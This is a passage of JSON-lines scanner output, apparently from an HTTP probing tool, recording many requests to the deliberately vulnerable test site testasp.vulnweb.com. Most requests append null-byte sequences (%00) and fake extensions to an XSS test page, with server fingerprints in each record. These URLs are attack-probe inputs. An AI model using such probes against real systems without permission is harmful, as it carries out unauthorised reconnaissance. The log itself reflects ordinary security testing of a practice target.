Server\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":33,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:18:08.191550935Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/xss.html?%00.html\",\"input\":\"http://testasp.vulnweb.com/t/xss.html?%00.html\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/xss.html?%00.html\",\"time\":\"343.164068ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":33,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:18:08.196645413Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/xss.html?%00.gif\",\"input\":\"http://testasp.vulnweb.com/t/xss.html?%00.gif\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/xss.html?%00.gif\",\"time\":\"355.714793ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":33,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:18:08.20114376Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/xss.html?%00.html?\",\"input\":\"http://testasp.vulnweb.com/t/xss.html?%00.html?\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/xss.html?%00.html?\",\"time\":\"348.216085ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":33,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:18:08.20253491Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/xss.html?%00.jpg\",\"input\":\"http://testasp.vulnweb.com/t/xss.html?%00.jpg\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/xss.html?%00.jpg\",\"time\":\"343.607739ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":33,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:18:08.443536157Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/xss.html?%00.jpg%5E1581\",\"input\":\"http://testasp.vulnweb.com/t/xss.html?%00.jpg%5E1581\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/xss.html?%00.jpg%5E1581\",\"time\":\"348.266016ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":33,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:18:08.495215513Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/xss.html?%00.jpg%5E1890\",\"input\":\"http://testasp.vulnweb.com/t/xss.html?%00.jpg%5E1890\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/xss.html?%00.jpg%5E1890\",\"time\":\"344.225534ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":33,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:18:08.570659139Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/xss.html?%00.jpg%5E4117\",\"input\":\"http://testasp.vulnweb.com/t/xss.html?%00.jpg%5E4117\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/xss.html?%00.jpg%5E4117\",\"time\":\"351.932241ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":33,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:18:08.594226411Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/xss.html?%00.jpg%5Esample@email.tst\",\"input\":\"http://testasp.vulnweb.com/t/xss.html?%00.jpg%5Esample@email.tst\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/xss.html?%00.jpg%5Esample@email.tst\",\"time\":\"343.079447ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":33,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:18:08.596902432Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/xss.html?%00.jpg%5E811\",\"input\":\"http://testasp.vulnweb.com/t/xss.html?%00.jpg%5E811\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/xss.html?%00.jpg%5E811\",\"time\":\"352.670251ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":33,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:18:08.710411715Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/xss.html?%00.jpg,1,1413,0,active\",\"input\":\"http://testasp.vulnweb.com/t/xss.html?%00.jpg,1,1413,0,active\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/xss.html?%00.jpg,1,1413,0,active\",\"time\":\"352.4793ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":33,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:18:08.863900531Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/xss.html?%00.jpg,1,1415,0,active\",\"input\":\"http://testasp.vulnweb.com/t/xss.html?%00.jpg,1,1415,0,active\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/xss.html?%00.jpg,1,1415,0,active\",\"time\":\"343.795048ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":33,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:18:08.92402172Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/xss.html?%00.jpg,1,1416,0,active\",\"input\":\"http://testasp.vulnweb.com/t/xss.html?%00.jpg,1,1416,0,active\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/xss.html?%00.jpg,1,1416,0,active\",\"time\":\"342.65795ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":33,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:18:08.933772745Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/xss.html?%00.jpg,1,1420,0,active\",\"input\":\"http://testasp.vulnweb.com/t/xss.html?%00.jpg,1,1420,0,active\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/xss.html?%00.jpg,1,1420,0,active\",\"time\":\"345.339895ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":33,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:18:08.942244209Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/xss.html?%00.jpg,1,1418,0,active\",\"input\":\"http://testasp.vulnweb.com/t/xss.html?%00.jpg,1,1418,0,active\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/xss.html?%00.jpg,1,1418,0,active\",\"time\":\"355.655062ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":33,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:18:08.949203599Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/xss.html?%00.jpg,1,1421,0,active\",\"input\":\"http://testasp.vulnweb.com/t/xss.html?%00.jpg,1,1421,0,active\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/xss.html?%00.jpg,1,1421,0,active\",\"time\":\"348.75071ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":33,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:18:08.963571155Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/xss.html?%00.jpg,1,1423,0,active\",\"input\":\"http://testasp.vulnweb.com/t/xss.html?%00.jpg,1,1423,0,active\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/xss.html?%00.jpg,1,1423,0,active\",\"time\":\"345.261974ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":33,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:18:09.024777177Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/xss.html?%00.jpg,1,1424,0,active\",\"input\":\"http://testasp.vulnweb.com/t/xss.html?%00.jpg,1,1424,0,active\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/xss.html?%00.jpg,1,1424,0,active\",\"time\":\"356.014176ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":33,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:18:09.087370001Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/xss.html?%00.jpg,1,1426,0,active\",\"input\":\"http://testasp.vulnweb.com/t/xss.html?%00.jpg,1,1426,0,active\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/xss.html?%00.jpg,1,1426,0,active\",\"time\":\"356.367875ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":33,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:18:09.151787649Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/xss.html?%00.jpg,1,1428,0,active\",\"input\":\"http://testasp.vulnweb.com/t/xss.html?%00.jpg,1,1428,0,active\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/xss.html?%00.jpg,1,1428,0,active\",\"time\":\"355.983034ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":33,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:18:18.42248746Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/xss.html?%00.jpg,1,1429,0,active\",\"input\":\"http://testasp.vulnweb.com/t/xss.html?%00.jpg,1,1429,0,active\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/xss.html?%00.jpg,1,1429,0,active\",\"time\":\"345.264861ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":33,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:18:18.453717409Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/xss.html?%00.jpg,1,1430,0,active\",\"input\":\"http://testasp.vulnweb.com/t/xss.html?%00.jpg,1,1430,0,active\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/xss.html?%00.jpg,1,1430,0,active\",\"time\":\"339.859221ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":33,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:18:18.474250591Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/xss.html?%00.jpg,1,1435,0,active\",\"input\":\"http://testasp.vulnweb.com/t/xss.html?%00.jpg,1,1435,0,active\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/xss.html?%00.jpg,1,1435,0,active\",\"time\":\"343.223945ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":33,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:18:18.474559297Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/xss.html?%00.jpg,1,1432,0,active\",\"input\":\"http://testasp.vulnweb.com/t/xss.html?%00.jpg,1,1432,0,active\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/xss.html?%00.jpg,1,1432,0,active\",\"time\":\"359.817738ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":33,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:18:18.480309966Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/xss.html?%00.jpg,1,1433,0,active\",\"input\":\"http://testasp.vulnweb.com/t/xss.html?%00.jpg,1,1433,0,active\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/xss.html?%00.jpg,1,1433,0,active\",\"time\":\"351.972544ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":33,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:18:18.48768347Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/xss.html?%00.jpg,1,1438,0,active\",\"input\":\"http://testasp.vulnweb.com/t/xss.html?%00.jpg,1,1438,0,active\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/xss.html?%00.jpg,1,1438,0,active\",\"time\":\"346.022253ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":33,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:18:18.489756025Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/xss.html?%00.jpg,1,1439,0,active\",\"input\":\"http://testasp.vulnweb.com/t/xss.html?%00.jpg,1,1439,0,active\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/xss.html?%00.jpg,1,1439,0,active\",\"time\":\"343.991803ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":33,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:18:18.519656746Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/xss.html?%00.jpg,1,1442,0,active\",\"input\":\"http://testasp.vulnweb.com/t/xss.html?%00.jpg,1,1442,0,active\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/xss.html?%00.jpg,1,1442,0,active\",\"time\":\"348.149728ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":33,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:18:18.519668297Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/xss.html?%00.jpg,1,1441,0,active\",\"input\":\"http://testasp.vulnweb.com/t/xss.html?%00.jpg,1,1441,0,active\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/xss.html?%00.jpg,1,1441,0,active\",\"time\":\"348.652064ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":33,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:18:18.529120988Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/xss.html?%00.jpg,1,1445,0,active\",\"input\":\"http://testasp.vulnweb.com/t/xss.html?%00.jpg,1,1445,0,active\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/xss.html?%00.jpg,1,1445,0,active\",\"time\":\"340.055639ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":33,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:18:18.532379736Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/xss.html?%00.jpg,1,1444,0,active\",\"input\":\"http://testasp.vulnweb.com/t/xss.html?%00.jpg,1,1444,0,active\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/xss.html?%00.jpg,1,1444,0,active\",\"time\":\"348.311064ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":33,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:18:18.536263013Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/xss.html?%00.jpg,1,1447,0,active\",\"input\":\"http://testasp.vulnweb.com/t/xss.html?%00.jpg,1,1447,0,active\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/xss.html?%00.jpg,1,1447,0,active\",\"time\":\"343.305091ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":33,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:18:18.54241211Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/xss.html?%00.jpg,1,1452,0,active\",\"input\":\"http://testasp.vulnweb.com/t/xss.html?%00.jpg,1,1452,0,active\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/xss.html?%00.jpg,1,1452,0,active\",\"time\":\"338.531436ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":33,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:18:18.554843045Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/xss.html?%00.jpg,1,1448,0,active\",\"input\":\"http://testasp.vulnweb.com/t/xss.html?%00.jpg,1,1448,0,active\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/xss.html?%00.jpg,1,1448,0,active\",\"time\":\"356.458214ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":33,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:18:18.560022232Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/xss.html?%00.jpg,1,1451,0,active\",\"input\":\"http://testasp.vulnweb.com/t/xss.html?%00.jpg,1,1451,0,active\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/xss.html?%00.jpg,1,1451,0,active\",\"time\":\"357.045654ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":33,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:18:18.796662776Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/xss.html?%00.jpg,1,1455,0,active\",\"input\":\"http://testasp.vulnweb.com/t/xss.html?%00.jpg,1,1455,0,active\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/xss.html?%00.jpg,1,1455,0,active\",\"time\":\"350.845759ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":33,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:18:18.835704732Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/xss.html?%00.jpg,1,1457,0,active\",\"input\":\"http://testasp.vulnweb.com/t/xss.html?%00.jpg,1,1457,0,active\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/xss.html?%00.jpg,1,1457,0,active\",\"time\":\"338.477636ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":33,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:18:18.920072887Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/xss.html?%00.jpg,1,1458,0,active\",\"input\":\"http://testasp.vulnweb.com/t/xss.html?%00.jpg,1,1458,0,active\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/xss.html?%00.jpg,1,1458,0,active\",\"time\":\"346.609141ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":33,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:18:18.942592803Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/xss.html?%00.jpg,1,1462,0,active\",\"input\":\"http://testasp.vulnweb.com/t/xss.html?%00.jpg,1,1462,0,active\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/xss.html?%00.jpg,1,1462,0,active\",\"time\":\"344.011916ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows 